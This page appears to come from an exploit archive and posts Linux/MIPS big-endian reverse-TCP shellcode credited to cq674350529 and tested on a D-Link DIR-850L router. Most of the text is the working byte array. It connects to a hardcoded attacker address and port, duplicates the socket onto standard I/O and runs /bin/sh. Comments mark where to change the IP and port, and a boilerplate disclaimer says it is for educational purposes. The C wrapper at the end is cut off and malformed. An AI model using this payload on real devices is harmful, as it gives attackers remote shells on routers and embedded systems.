Linux/mips (big endian) execve(/bin/sh) + reverse tcp ( shellcode (181 bytes) Vulnerability / Exploit

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Exploits / Vulnerability Discovered : 2018-10-08 | Type : shellcode | Platform : linux_mips
This exploit / vulnerability Linux/mips (big endian) execve(/bin/sh) + reverse tcp ( shellcode (181 bytes) is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Linux/MIPS (Big Endian) - execve(/bin/sh) + Reverse TCP Shellcode (181 bytes)
# Author: cq674350529
# Date: 2018-10-07
# - execve('/bin/sh'), tcp -
# - used in HTTP Request
# - tested on D-Link dir-850l router, avoid bad chars ('\x00', '\x20', '\x23', '\x0d\x0a')
# - based on rigan's shellcode and metasploit's shellcode, no encoder used

#include <stdio.h>

unsigned char sc[] =
"\x24\x0f\xff\xfa" // li $t7, -6
"\x01\xe0\x78\x27" // nor $t7, $zero
"\x21\xe4\xff\xfd" // addi $a0, $t7, -3
"\x21\xe5\xff\xfd" // addi $a1, $t7, -3
"\x28\x06\xff\xff" // slti $a2, $zero, -1
"\x24\x02\x10\x57" // li $v0, 4183 ( sys_socket )
"\x01\x01\x01\x0c" // syscall 0x40404
"\xaf\xa2\xff\xff" // sw $v0, -1($sp)
"\x8f\xa4\xff\xff" // lw $a0, -1($sp)
"\x34\x0f\xff\xfd" // li $t7, -3 ( sa_family = AF_INET )
"\x01\xe0\x78\x27" // nor $t7, $zero
"\xaf\xaf\xff\xe0" // sw $t7, -0x20($sp)

/* ================ You can change port here ================= */
"\x3c\x0e\x7a\x69" // lui $t6, 0x7a69 ( sin_port = 0x7a69 )
/* ============================================================ */

"\x35\xce\x7a\x69" // ori $t6, $t6, 0x7a69
"\xaf\xae\xff\xe4" // sw $t6, -0x1c($sp)

/* ================ You can change ip here ================= */
"\x3c\x0e\xc0\xa8" // lui $t6, 0xc0a8 ( sin_addr = 0xc0a8 ...
"\x35\xce\x02\x9d" // ori $t6, $t6, 0x029d ... 0x029d
/* ============================================================ */

"\xaf\xae\xff\xe6" // sw $t6, -0x1a($sp)
"\x27\xa5\xff\xe2" // addiu $a1, $sp, -0x1e
"\x24\x0c\xff\xef" // li $t4, -17 ( addrlen = 16 )
"\x01\x80\x30\x27" // nor $a2, $t4, $zero
"\x24\x02\x10\x4a" // li $v0, 4170 ( sys_connect )
"\x01\x01\x01\x0c" // syscall 0x40404
"\x24\x0f\xff\xfd" // li t7,-3
"\x01\xe0\x28\x27" // nor a1,t7,zero
"\x8f\xa4\xff\xff" // lw $a0, -1($sp)
// dup2_loop:
"\x24\x02\x0f\xdf" // li $v0, 4063 ( sys_dup2 )
"\x01\x01\x01\x0c" // syscall 0x40404
"\x24\xa5\xff\xff" // addi a1,a1,-1 (\x20\xa5\xff\xff)
"\x24\x01\xff\xff" // li at,-1
"\x14\xa1\xff\xfb" // bne a1,at, dup2_loop
"\x28\x06\xff\xff" // slti $a2, $zero, -1
"\x3c\x0f\x2f\x2f" // lui $t7, 0x2f2f
"\x35\xef\x62\x69" // ori $t7, $t7, 0x6269
"\xaf\xaf\xff\xec" // sw $t7, -0x14($sp)
"\x3c\x0e\x6e\x2f" // lui $t6, 0x6e2f
"\x35\xce\x73\x68" // ori $t6, $t6, 0x7368
"\xaf\xae\xff\xf0" // sw $t6, -0x10($sp)
"\xaf\xa0\xff\xf4" // sw $zero, -0xc($sp)
"\x27\xa4\xff\xec" // addiu $a0, $sp, -0x14
"\xaf\xa4\xff\xf8" // sw $a0, -8($sp)
"\xaf\xa0\xff\xfc" // sw $zero, -4($sp)
"\x27\xa5\xff\xf8" // addiu $a1, $sp, -8
"\x24\x02\x0f\xab" // li $v0, 4011 (sys_execve)
"\x01\x01\x01\x0c"; // syscall 0x40404

void main(void)
printf("size: %d\n", sizeof(sc));
s = sc;

Linux/mips (big endian) execve(/bin/sh) + reverse tcp ( shellcode (181 bytes)

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Linux/mips (big endian) execve(/bin/sh) + reverse tcp ( shellcode (181 bytes) Vulnerability / Exploit